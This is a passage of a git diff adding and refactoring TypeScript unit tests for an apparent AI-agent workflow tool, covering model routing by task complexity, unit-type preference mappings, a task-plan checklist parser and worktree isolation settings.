+    const overrides: Record<string, Partial<ModelCapabilities>> = { "gpt-4o": { coding: 99 } };
+    const result = resolveModelForComplexity(
+      { tier: "standard", reason: "test", downgraded: false },
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      ["claude-opus-4-6", "claude-sonnet-4-6", "gpt-4o"],
+      "execute-task",
+      undefined,
+      overrides,
+    );
+    assert.equal(result.selectionMethod, "capability-scored");
+    assert.equal(result.modelId, "gpt-4o", "gpt-4o should win with coding override");
+  });
+
+  // 6. Regression: existing routing guards unchanged
+  test("regression: routing-disabled passthrough still returns tier-only", () => {
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: false };
+    const result = resolveModelForComplexity(
+      { tier: "light", reason: "test", downgraded: false },
+      { primary: "claude-opus-4-6", fallbacks: [] },
+      config,
+      MULTI_MODEL_AVAILABLE,
+      "execute-task",
+      undefined,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+    assert.equal(result.wasDowngraded, false);
+    assert.equal(result.modelId, "claude-opus-4-6");
+  });
+
+  test("regression: unknown-model bypass returns tier-only and does not downgrade", () => {
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: true };
+    const result = resolveModelForComplexity(
+      { tier: "light", reason: "test", downgraded: false },
+      { primary: "totally-unknown-custom-model", fallbacks: [] },
+      config,
+      ["totally-unknown-custom-model", ...MULTI_MODEL_AVAILABLE],
+      "execute-task",
+      undefined,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+    assert.equal(result.wasDowngraded, false);
+    assert.equal(result.modelId, "totally-unknown-custom-model");
+  });
+
+  test("regression: no-downgrade-needed path returns tier-only", () => {
+    const config: DynamicRoutingConfig = { ...defaultRoutingConfig(), enabled: true, capability_routing: true };
+    // Configured model is sonnet (standard), requesting standard → no downgrade needed
+    const result = resolveModelForComplexity(
+      { tier: "standard", reason: "test", downgraded: false },
+      { primary: "claude-sonnet-4-6", fallbacks: [] },
+      config,
+      MULTI_MODEL_AVAILABLE,
+      "execute-task",
+      undefined,
+    );
+    assert.equal(result.selectionMethod, "tier-only");
+    assert.equal(result.wasDowngraded, false);
+    assert.equal(result.modelId, "claude-sonnet-4-6");
+  });
+});
+
+// ─── getModelTier unknown default ────────────────────────────────────────────
+
+describe("getModelTier unknown default", () => {
+  test("unknown model returns standard tier (not heavy) via downgrade behavior", () => {
+    // We can verify this indirectly: resolveModelForComplexity for a standard classification
+    // with an unknown primary model should NOT downgrade (because unknown → standard, not heavy)
+    const config = { ...defaultRoutingConfig(), enabled: true };
+    // Use "unknown-model-xyz" as primary — its tier will be "standard" per D-15
+    // Classification is "heavy" → tier >= standard → no downgrade
+    // But unknown models use the isKnownModel() guard, so they pass through anyway
+    // Test the positive: an unknown model is NOT treated as heavy
+    const result = resolveModelForComplexity(
+      makeClassification("standard"),
+      { primary: "claude-sonnet-4-6", fallbacks: [] },
+      config,
+      ["claude-sonnet-4-6", "claude-haiku-4-5", "gpt-4o-mini"],
+    );
+    // standard classification with standard model (sonnet) → no downgrade
+    assert.equal(result.wasDowngraded, false, "standard model should not downgrade for standard task");
+    assert.equal(result.modelId, "claude-sonnet-4-6");
+  });
+
+  test("unknown model in getEligibleModels defaults to standard tier", () => {
+    // Per D-15: getModelTier returns "standard" for unknown models
+    const config: DynamicRoutingConfig = defaultRoutingConfig();
+    const standardModels = getEligibleModels("standard", ["totally-unknown-model-abc"], config);
+    const lightModels = getEligibleModels("light", ["totally-unknown-model-abc"], config);
+    const heavyModels = getEligibleModels("heavy", ["totally-unknown-model-abc"], config);
+    assert.ok(standardModels.includes("totally-unknown-model-abc"), "Unknown model should be in standard tier");
+    assert.equal(lightModels.length, 0, "Unknown model should NOT be in light tier");
+    assert.equal(heavyModels.length, 0, "Unknown model should NOT be in heavy tier");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/model-unittype-mapping.test.ts b/src/resources/extensions/gsd/tests/model-unittype-mapping.test.ts
new file mode 100644
index 000000000..82267a3e1
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/model-unittype-mapping.test.ts
@@ -0,0 +1,220 @@
+/**
+ * Model UnitType Mapping — regression tests for #2865.
+ *
+ * Verifies that all auto-dispatch unitTypes have corresponding entries in:
+ * - resolveModelWithFallbacksForUnit (preferences-models.ts)
+ * - classifyUnitPhase (metrics.ts)
+ * - LIFECYCLE_ONLY_UNITS (auto-post-unit.ts)
+ * - unitVerb / unitPhaseLabel (auto-dashboard.ts)
+ * - resolveExpectedArtifactPath (auto-artifact-paths.ts)
+ *
+ * Uses source-level checks to avoid import resolution issues in dev.
+ *
+ * Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+function readSrc(file: string): string {
+  return readFileSync(join(gsdDir, file), "utf-8");
+}
+
+const preferencesSrc = readSrc("preferences-models.ts");
+const metricsSrc = readSrc("metrics.ts");
+const postUnitSrc = readSrc("auto-post-unit.ts");
+const dashboardSrc = readSrc("auto-dashboard.ts");
+const artifactSrc = readSrc("auto-artifact-paths.ts");
+const guidedFlowSrc = readSrc("guided-flow.ts");
+const autoDispatchSrc = readSrc("auto-dispatch.ts");
+
+// Derive unitTypes directly from auto-dispatch.ts source so the test
+// automatically tracks dispatch rule changes (Copilot review feedback).
+const AUTO_DISPATCH_UNIT_TYPES = (() => {
+  const unitTypeRegex = /unitType:\s*["']([^"']+)["']/g;
+  const unitTypes = new Set<string>();
+  let match: RegExpExecArray | null;
+  while ((match = unitTypeRegex.exec(autoDispatchSrc)) !== null) {
+    unitTypes.add(match[1]);
+  }
+  return Array.from(unitTypes);
+})();
+
+// Additionally include unitTypes used by guided-flow but not auto-dispatch
+// (e.g., discuss-slice is dispatched by guided-flow but not auto-dispatch).
+const ALL_KNOWN_UNIT_TYPES = [
+  ...new Set([...AUTO_DISPATCH_UNIT_TYPES, "discuss-slice"]),
+];
+
+// ═══════════════════════════════════════════════════════════════════════════
+// #2865: discuss dispatches must NOT alias to plan unitTypes
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("#2865: no dispatchWorkflow with gsd-discuss customType uses plan-milestone", () => {
+  // Match dispatchWorkflow calls where "gsd-discuss" appears before "plan-milestone"
+  // in the same call (the 5 args are on consecutive lines).
+  const blocks = guidedFlowSrc.split(/dispatchWorkflow\(/);
+  for (const block of blocks) {
+    const callEnd = block.indexOf(");");
+    if (callEnd === -1) continue;
+    const call = block.slice(0, callEnd);
+    if (call.includes('"gsd-discuss"') && call.includes('"plan-milestone"')) {
+      assert.fail(`Discuss dispatch should not use plan-milestone: ...dispatchWorkflow(${call.slice(0, 120).trim()}...`);
+    }
+  }
+});
+
+test("#2865: no dispatchWorkflow with gsd-discuss customType uses plan-slice", () => {
+  const blocks = guidedFlowSrc.split(/dispatchWorkflow\(/);
+  for (const block of blocks) {
+    const callEnd = block.indexOf(");");
+    if (callEnd === -1) continue;
+    const call = block.slice(0, callEnd);
+    if (call.includes('"gsd-discuss"') && call.includes('"plan-slice"')) {
+      assert.fail(`Discuss slice dispatch should not use plan-slice: ...dispatchWorkflow(${call.slice(0, 120).trim()}...`);
+    }
+  }
+});
+
+test("#2865: no buildDiscussPrompt call dispatches with plan-milestone", () => {
+  const blocks = guidedFlowSrc.split(/dispatchWorkflow\(/);
+  for (const block of blocks) {
+    const callEnd = block.indexOf(");");
+    if (callEnd === -1) continue;
+    const call = block.slice(0, callEnd);
+    if (call.includes("buildDiscussPrompt") && call.includes('"plan-milestone"')) {
+      assert.fail(`buildDiscussPrompt dispatch should not use plan-milestone`);
+    }
+  }
+});
+
+test("#2865: no buildDiscussSlicePrompt call dispatches with plan-slice", () => {
+  const blocks = guidedFlowSrc.split(/dispatchWorkflow\(/);
+  for (const block of blocks) {
+    const callEnd = block.indexOf(");");
+    if (callEnd === -1) continue;
+    const call = block.slice(0, callEnd);
+    if (call.includes("buildDiscussSlicePrompt") && call.includes('"plan-slice"')) {
+      assert.fail(`buildDiscussSlicePrompt dispatch should not use plan-slice`);
+    }
+  }
+});
+
+test("#2865: no guided-discuss-milestone loadPrompt dispatches with plan-milestone", () => {
+  const blocks = guidedFlowSrc.split(/dispatchWorkflow\(/);
+  for (const block of blocks) {
+    const callEnd = block.indexOf(");");
+    if (callEnd === -1) continue;
+    const call = block.slice(0, callEnd);
+    if (call.includes("guided-discuss-milestone") && call.includes('"plan-milestone"')) {
+      assert.fail(`guided-discuss-milestone dispatch should not use plan-milestone`);
+    }
+  }
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// preferences-models.ts: resolveModelWithFallbacksForUnit coverage
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("resolveModelWithFallbacksForUnit handles discuss-milestone", () => {
+  assert.ok(preferencesSrc.includes('"discuss-milestone"'), "missing discuss-milestone case");
+});
+
+test("resolveModelWithFallbacksForUnit handles discuss-slice", () => {
+  assert.ok(preferencesSrc.includes('"discuss-slice"'), "missing discuss-slice case");
+});
+
+test("discuss unitTypes fall back to planning when models.discuss is unset", () => {
+  assert.ok(
+    preferencesSrc.includes("m.discuss ?? m.planning"),
+    "discuss should fall back to m.planning",
+  );
+});
+
+test("validation unitTypes fall back to planning when models.validation is unset", () => {
+  assert.ok(
+    preferencesSrc.includes("m.validation ?? m.planning"),
+    "validation should fall back to m.planning",
+  );
+});
+
+test("all auto-dispatch unitTypes have preference mapping or subagent handling", () => {
+  const unmapped: string[] = [];
+  for (const ut of ALL_KNOWN_UNIT_TYPES) {
+    if (!preferencesSrc.includes(`"${ut}"`)) {
+      unmapped.push(ut);
+    }
+  }
+  assert.deepEqual(unmapped, [], `Unmapped unitTypes in preferences-models.ts: ${unmapped.join(", ")}`);
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// #2900: worktree-merge must map to completion phase
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("#2900: resolveModelWithFallbacksForUnit handles worktree-merge", () => {
+  assert.ok(preferencesSrc.includes('"worktree-merge"'), "missing worktree-merge case in switch");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// #2900: KNOWN_UNIT_TYPES must include all dispatched unit types
+// ═══════════════════════════════════════════════════════════════════════════
+
+const preferenceTypesSrc = readSrc("preferences-types.ts");
+
+test("#2900: KNOWN_UNIT_TYPES includes all auto-dispatch unit types", () => {
+  const missing: string[] = [];
+  for (const ut of ALL_KNOWN_UNIT_TYPES) {
+    if (!preferenceTypesSrc.includes(`"${ut}"`)) {
+      missing.push(ut);
+    }
+  }
+  assert.deepEqual(missing, [], `Missing from KNOWN_UNIT_TYPES: ${missing.join(", ")}`);
+});
+
+test("#2900: KNOWN_UNIT_TYPES includes worktree-merge", () => {
+  assert.ok(preferenceTypesSrc.includes('"worktree-merge"'), "worktree-merge missing from KNOWN_UNIT_TYPES");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// metrics.ts: classifyUnitPhase coverage
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("classifyUnitPhase includes discussion phase", () => {
+  assert.ok(metricsSrc.includes('"discussion"'), "MetricsPhase should include discussion");
+});
+
+test("classifyUnitPhase maps discuss-milestone and discuss-slice", () => {
+  assert.ok(metricsSrc.includes('"discuss-milestone"'), "missing discuss-milestone in metrics");
+  assert.ok(metricsSrc.includes('"discuss-slice"'), "missing discuss-slice in metrics");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// auto-post-unit.ts: LIFECYCLE_ONLY_UNITS
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("LIFECYCLE_ONLY_UNITS includes discuss-slice", () => {
+  assert.ok(postUnitSrc.includes('"discuss-slice"'), "discuss-slice should be lifecycle-only");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// auto-dashboard.ts: display label coverage
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("unitVerb handles discuss-slice", () => {
+  assert.ok(dashboardSrc.includes('"discuss-slice"'), "missing discuss-slice in dashboard");
+});
+
+// ═══════════════════════════════════════════════════════════════════════════
+// auto-artifact-paths.ts: artifact resolution
+// ═══════════════════════════════════════════════════════════════════════════
+
+test("resolveExpectedArtifactPath handles discuss-slice", () => {
+  assert.ok(artifactSrc.includes('"discuss-slice"'), "missing discuss-slice in artifact paths");
+});
diff --git a/src/resources/extensions/gsd/tests/must-have-parser.test.ts b/src/resources/extensions/gsd/tests/must-have-parser.test.ts
index 23cfa4c81..28eb19c98 100644
--- a/src/resources/extensions/gsd/tests/must-have-parser.test.ts
+++ b/src/resources/extensions/gsd/tests/must-have-parser.test.ts
@@ -1,13 +1,12 @@
 import { parseTaskPlanMustHaves } from '../files.ts';
-import { createTestContext } from './test-helpers.ts';
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
-const { assertEq, assertTrue, report } = createTestContext();
 // ═══════════════════════════════════════════════════════════════════════════
 // (a) Standard unchecked format: - [ ] text
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: standard unchecked ===');
-{
+test('parseTaskPlanMustHaves: standard unchecked', () => {
   const content = `# T01: Test Task
 
 ## Must-Haves
@@ -16,56 +15,53 @@ console.log('\n=== parseTaskPlanMustHaves: standard unchecked ===');
 - [ ] Second must-have item
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 2, 'should return 2 items');
-  assertEq(result[0].text, 'First must-have item', 'first item text');
-  assertEq(result[0].checked, false, 'first item unchecked');
-  assertEq(result[1].text, 'Second must-have item', 'second item text');
-  assertEq(result[1].checked, false, 'second item unchecked');
-}
+  assert.deepStrictEqual(result.length, 2, 'should return 2 items');
+  assert.deepStrictEqual(result[0].text, 'First must-have item', 'first item text');
+  assert.deepStrictEqual(result[0].checked, false, 'first item unchecked');
+  assert.deepStrictEqual(result[1].text, 'Second must-have item', 'second item text');
+  assert.deepStrictEqual(result[1].checked, false, 'second item unchecked');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (b) Checked variants: - [x] and - [X]
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: checked [x] and [X] ===');
-{
+test('parseTaskPlanMustHaves: checked [x] and [X]', () => {
   const content = `## Must-Haves
 
 - [x] Lowercase checked item
 - [X] Uppercase checked item
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 2, 'should return 2 items');
-  assertEq(result[0].checked, true, 'lowercase x is checked');
-  assertEq(result[0].text, 'Lowercase checked item', 'lowercase x text');
-  assertEq(result[1].checked, true, 'uppercase X is checked');
-  assertEq(result[1].text, 'Uppercase checked item', 'uppercase X text');
-}
+  assert.deepStrictEqual(result.length, 2, 'should return 2 items');
+  assert.deepStrictEqual(result[0].checked, true, 'lowercase x is checked');
+  assert.deepStrictEqual(result[0].text, 'Lowercase checked item', 'lowercase x text');
+  assert.deepStrictEqual(result[1].checked, true, 'uppercase X is checked');
+  assert.deepStrictEqual(result[1].text, 'Uppercase checked item', 'uppercase X text');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (c) No-checkbox bullets: - text
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: no-checkbox bullets ===');
-{
+test('parseTaskPlanMustHaves: no-checkbox bullets', () => {
   const content = `## Must-Haves
 
 - Plain bullet item
 - Another plain item
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 2, 'should return 2 items');
-  assertEq(result[0].text, 'Plain bullet item', 'plain bullet text');
-  assertEq(result[0].checked, false, 'plain bullet defaults to unchecked');
-  assertEq(result[1].text, 'Another plain item', 'second plain bullet text');
-}
+  assert.deepStrictEqual(result.length, 2, 'should return 2 items');
+  assert.deepStrictEqual(result[0].text, 'Plain bullet item', 'plain bullet text');
+  assert.deepStrictEqual(result[0].checked, false, 'plain bullet defaults to unchecked');
+  assert.deepStrictEqual(result[1].text, 'Another plain item', 'second plain bullet text');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (d) Indented variants
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: indented variants ===');
-{
+test('parseTaskPlanMustHaves: indented variants', () => {
   const content = `## Must-Haves
 
   - [ ] Indented unchecked item
@@ -73,21 +69,20 @@ console.log('\n=== parseTaskPlanMustHaves: indented variants ===');
   - Plain indented item
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 3, 'should return 3 items');
-  assertEq(result[0].text, 'Indented unchecked item', 'indented unchecked text');
-  assertEq(result[0].checked, false, 'indented unchecked state');
-  assertEq(result[1].text, 'Indented checked item', 'indented checked text');
-  assertEq(result[1].checked, true, 'indented checked state');
-  assertEq(result[2].text, 'Plain indented item', 'indented plain text');
-  assertEq(result[2].checked, false, 'indented plain state');
-}
+  assert.deepStrictEqual(result.length, 3, 'should return 3 items');
+  assert.deepStrictEqual(result[0].text, 'Indented unchecked item', 'indented unchecked text');
+  assert.deepStrictEqual(result[0].checked, false, 'indented unchecked state');
+  assert.deepStrictEqual(result[1].text, 'Indented checked item', 'indented checked text');
+  assert.deepStrictEqual(result[1].checked, true, 'indented checked state');
+  assert.deepStrictEqual(result[2].text, 'Plain indented item', 'indented plain text');
+  assert.deepStrictEqual(result[2].checked, false, 'indented plain state');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (e) Mixed checkbox states in one section
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: mixed states ===');
-{
+test('parseTaskPlanMustHaves: mixed states', () => {
   const content = `## Must-Haves
 
 - [ ] Unchecked one
@@ -97,20 +92,19 @@ console.log('\n=== parseTaskPlanMustHaves: mixed states ===');
 - [ ] Another unchecked
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 5, 'should return 5 items');
-  assertEq(result[0].checked, false, 'first is unchecked');
-  assertEq(result[1].checked, true, 'second is checked');
-  assertEq(result[2].checked, true, 'third is checked (uppercase)');
-  assertEq(result[3].checked, false, 'fourth (plain) is unchecked');
-  assertEq(result[4].checked, false, 'fifth is unchecked');
-}
+  assert.deepStrictEqual(result.length, 5, 'should return 5 items');
+  assert.deepStrictEqual(result[0].checked, false, 'first is unchecked');
+  assert.deepStrictEqual(result[1].checked, true, 'second is checked');
+  assert.deepStrictEqual(result[2].checked, true, 'third is checked (uppercase)');
+  assert.deepStrictEqual(result[3].checked, false, 'fourth (plain) is unchecked');
+  assert.deepStrictEqual(result[4].checked, false, 'fifth is unchecked');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (f) Missing Must-Haves section → empty array
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: missing section ===');
-{
+test('parseTaskPlanMustHaves: missing section', () => {
   const content = `# T01: Some Task
 
 ## Description
@@ -122,16 +116,15 @@ Some description here.
 - Run tests
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 0, 'returns empty array when section missing');
-  assertTrue(Array.isArray(result), 'result is an array');
-}
+  assert.deepStrictEqual(result.length, 0, 'returns empty array when section missing');
+  assert.ok(Array.isArray(result), 'result is an array');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (g) Empty Must-Haves section → empty array
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: empty section ===');
-{
+test('parseTaskPlanMustHaves: empty section', () => {
   const content = `## Must-Haves
 
 ## Verification
@@ -139,15 +132,14 @@ console.log('\n=== parseTaskPlanMustHaves: empty section ===');
 - Run tests
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 0, 'returns empty array when section is empty');
-}
+  assert.deepStrictEqual(result.length, 0, 'returns empty array when section is empty');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (h) Content with YAML frontmatter
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: YAML frontmatter ===');
-{
+test('parseTaskPlanMustHaves: YAML frontmatter', () => {
   const content = `---
 estimated_steps: 5
 estimated_files: 3
@@ -161,16 +153,16 @@ estimated_files: 3
 - [x] Checked must-have after frontmatter
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 2, 'frontmatter does not pollute results');
-  assertEq(result[0].text, 'Real must-have after frontmatter', 'first item text correct');
-  assertEq(result[0].checked, false, 'first item unchecked');
-  assertEq(result[1].text, 'Checked must-have after frontmatter', 'second item text correct');
-  assertEq(result[1].checked, true, 'second item checked');
-}
+  assert.deepStrictEqual(result.length, 2, 'frontmatter does not pollute results');
+  assert.deepStrictEqual(result[0].text, 'Real must-have after frontmatter', 'first item text correct');
+  assert.deepStrictEqual(result[0].checked, false, 'first item unchecked');
+  assert.deepStrictEqual(result[1].text, 'Checked must-have after frontmatter', 'second item text correct');
+  assert.deepStrictEqual(result[1].checked, true, 'second item checked');
+});
 
 // Verify frontmatter content is not misinterpreted as must-haves
-console.log('\n=== parseTaskPlanMustHaves: frontmatter-only content ===');
-{
+
+test('parseTaskPlanMustHaves: frontmatter-only content', () => {
   const content = `---
 estimated_steps: 5
 estimated_files: 3
@@ -183,15 +175,14 @@ estimated_files: 3
 No must-haves section here.
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 0, 'frontmatter-only content returns empty array');
-}
+  assert.deepStrictEqual(result.length, 0, 'frontmatter-only content returns empty array');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // (i) Real task plan format (based on S01/T01-PLAN.md structure)
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: real task plan format ===');
-{
+test('parseTaskPlanMustHaves: real task plan format', () => {
   const content = `---
 estimated_steps: 5
 estimated_files: 3
@@ -239,40 +230,37 @@ Add the \`completing-milestone\` phase to the GSD state machine.
 - \`agent/extensions/gsd/types.ts\` — Phase union includes \`'completing-milestone'\`
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 5, 'real plan has 5 must-haves');
-  assertTrue(result[0].text.includes('`Phase` type includes'), 'first must-have text matches');
-  assertTrue(result[1].text.includes('`deriveState` returns'), 'second must-have text matches');
-  assertEq(result[0].checked, false, 'all real must-haves are unchecked');
-  assertEq(result[4].checked, false, 'last real must-have is unchecked');
-  assertTrue(result[4].text.includes('multi-milestone'), 'last must-have references multi-milestone');
-}
+  assert.deepStrictEqual(result.length, 5, 'real plan has 5 must-haves');
+  assert.ok(result[0].text.includes('`Phase` type includes'), 'first must-have text matches');
+  assert.ok(result[1].text.includes('`deriveState` returns'), 'second must-have text matches');
+  assert.deepStrictEqual(result[0].checked, false, 'all real must-haves are unchecked');
+  assert.deepStrictEqual(result[4].checked, false, 'last real must-have is unchecked');
+  assert.ok(result[4].text.includes('multi-milestone'), 'last must-have references multi-milestone');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Edge cases
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== parseTaskPlanMustHaves: empty string ===');
-{
+test('parseTaskPlanMustHaves: empty string', () => {
   const result = parseTaskPlanMustHaves('');
-  assertEq(result.length, 0, 'empty string returns empty array');
-}
+  assert.deepStrictEqual(result.length, 0, 'empty string returns empty array');
+});
 
-console.log('\n=== parseTaskPlanMustHaves: must-haves with inline code and backticks ===');
-{
+test('parseTaskPlanMustHaves: must-haves with inline code and backticks', () => {
   const content = `## Must-Haves
 
 - [ ] \`functionName\` is exported from \`module.ts\`
 - [x] Returns \`Array<{ text: string }>\` with correct extraction
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 2, 'handles backtick content');
-  assertTrue(result[0].text.includes('`functionName`'), 'preserves backticks in text');
-  assertEq(result[0].checked, false, 'backtick item unchecked');
-  assertEq(result[1].checked, true, 'backtick item checked');
-}
+  assert.deepStrictEqual(result.length, 2, 'handles backtick content');
+  assert.ok(result[0].text.includes('`functionName`'), 'preserves backticks in text');
+  assert.deepStrictEqual(result[0].checked, false, 'backtick item unchecked');
+  assert.deepStrictEqual(result[1].checked, true, 'backtick item checked');
+});
 
-console.log('\n=== parseTaskPlanMustHaves: asterisk bullets ===');
-{
+test('parseTaskPlanMustHaves: asterisk bullets', () => {
   const content = `## Must-Haves
 
 * [ ] Asterisk unchecked
@@ -280,12 +268,11 @@ console.log('\n=== parseTaskPlanMustHaves: asterisk bullets ===');
 * Plain asterisk
 `;
   const result = parseTaskPlanMustHaves(content);
-  assertEq(result.length, 3, 'handles asterisk bullets');
-  assertEq(result[0].checked, false, 'asterisk unchecked');
-  assertEq(result[1].checked, true, 'asterisk checked');
-  assertEq(result[2].checked, false, 'plain asterisk unchecked');
-}
+  assert.deepStrictEqual(result.length, 3, 'handles asterisk bullets');
+  assert.deepStrictEqual(result[0].checked, false, 'asterisk unchecked');
+  assert.deepStrictEqual(result[1].checked, true, 'asterisk checked');
+  assert.deepStrictEqual(result[2].checked, false, 'plain asterisk unchecked');
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 
-report();
diff --git a/src/resources/extensions/gsd/tests/needs-remediation-revalidation.test.ts b/src/resources/extensions/gsd/tests/needs-remediation-revalidation.test.ts
new file mode 100644
index 000000000..4705cffab
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/needs-remediation-revalidation.test.ts
@@ -0,0 +1,48 @@
+/**
+ * Regression test for #3670 — needs-remediation verdict forces re-validation
+ *
+ * When validation returns needs-remediation, the state machine must route
+ * back to validating-milestone instead of completing-milestone. Without this,
+ * dispatch blocks completion for needs-remediation while state derives
+ * completing-milestone, creating a permanent deadlock.
+ *
+ * This structural test verifies the verdict === 'needs-remediation' guard
+ * exists at all three derivation paths in state.ts.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'state.ts'), 'utf-8');
+
+describe('needs-remediation revalidation guard (#3670)', () => {
+  test('verdict === needs-remediation guard exists in state.ts', () => {
+    const matches = source.match(/verdict\s*===\s*['"]needs-remediation['"]/g);
+    assert.ok(matches, 'verdict === "needs-remediation" check must exist in state.ts');
+    assert.ok(matches.length >= 2,
+      `Expected at least 2 needs-remediation guards (deriveStateFromDb + _deriveStateImpl), found ${matches.length}`);
+  });
+
+  test('needsRevalidation variable is derived from verdict', () => {
+    assert.match(source, /needsRevalidation.*=.*verdict\s*===\s*['"]needs-remediation['"]/,
+      'needsRevalidation should incorporate verdict === "needs-remediation"');
+  });
+
+  test('deriveStateFromDb path uses needs-remediation guard', () => {
+    assert.match(source, /!validationTerminal\s*\|\|\s*verdict\s*===\s*['"]needs-remediation['"]/,
+      'deriveStateFromDb should check !validationTerminal || verdict === "needs-remediation"');
+  });
+
+  test('extractVerdict is called on validation content', () => {
+    const extractCalls = source.match(/extractVerdict\(validationContent\)/g);
+    assert.ok(extractCalls, 'extractVerdict should be called on validation content');
+    assert.ok(extractCalls.length >= 2,
+      `Expected at least 2 extractVerdict calls, found ${extractCalls.length}`);
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/none-mode-gates.test.ts b/src/resources/extensions/gsd/tests/none-mode-gates.test.ts
index e28efd760..0a002556d 100644
--- a/src/resources/extensions/gsd/tests/none-mode-gates.test.ts
+++ b/src/resources/extensions/gsd/tests/none-mode-gates.test.ts
@@ -8,7 +8,7 @@
  * Uses the writeRunnerPreferences pattern from doctor-git.test.ts:
  * PROJECT_PREFERENCES_PATH is a module-level constant frozen at import
  * time, so process.chdir() won't redirect preference loading. We write
- * prefs to the runner's cwd .gsd/preferences.md and clean up in finally.
+ * prefs to the runner's cwd .gsd/PREFERENCES.md and clean up in finally.
  */
 
 import { mkdirSync, writeFileSync, rmSync, existsSync } from "node:fs";
@@ -19,13 +19,12 @@ import { shouldUseWorktreeIsolation } from "../auto.ts";
 import { getIsolationMode } from "../preferences.ts";
 import { getActiveAutoWorktreeContext } from "../auto-worktree.ts";
 import { invalidateAllCaches } from "../cache.ts";
-import { createTestContext } from "./test-helpers.ts";
-
-const { assertEq, assertTrue, report } = createTestContext();
+import { describe, test, beforeEach, afterEach } from 'node:test';
+import assert from 'node:assert/strict';
 
 // --- Preferences helpers (same pattern as doctor-git.test.ts K001) ---
 
-const RUNNER_PREFS_PATH = join(process.cwd(), ".gsd", "preferences.md");
+const RUNNER_PREFS_PATH = join(process.cwd(), ".gsd", "PREFERENCES.md");
 
 function writeRunnerPreferences(isolation: "none" | "worktree" | "branch"): void {
   mkdirSync(join(process.cwd(), ".gsd"), { recursive: true });
@@ -38,77 +37,116 @@ function removeRunnerPreferences(): void {
 
 // --- Tests ---
 
-// Test 1: shouldUseWorktreeIsolation returns false for none
-console.log("Test 1: shouldUseWorktreeIsolation returns false for none");
+test('shouldUseWorktreeIsolation returns false for none', () => {
 try {
   writeRunnerPreferences("none");
   invalidateAllCaches();
-  assertEq(shouldUseWorktreeIsolation(), false, "shouldUseWorktreeIsolation() with none prefs");
+  assert.deepStrictEqual(shouldUseWorktreeIsolation(), false, "shouldUseWorktreeIsolation() with none prefs");
 } finally {
   removeRunnerPreferences();
   invalidateAllCaches();
 }
+});
 
-// Test 2: shouldUseWorktreeIsolation returns false for branch
-console.log("Test 2: shouldUseWorktreeIsolation returns false for branch");
+test('shouldUseWorktreeIsolation returns false for branch', () => {
 try {
   writeRunnerPreferences("branch");
   invalidateAllCaches();
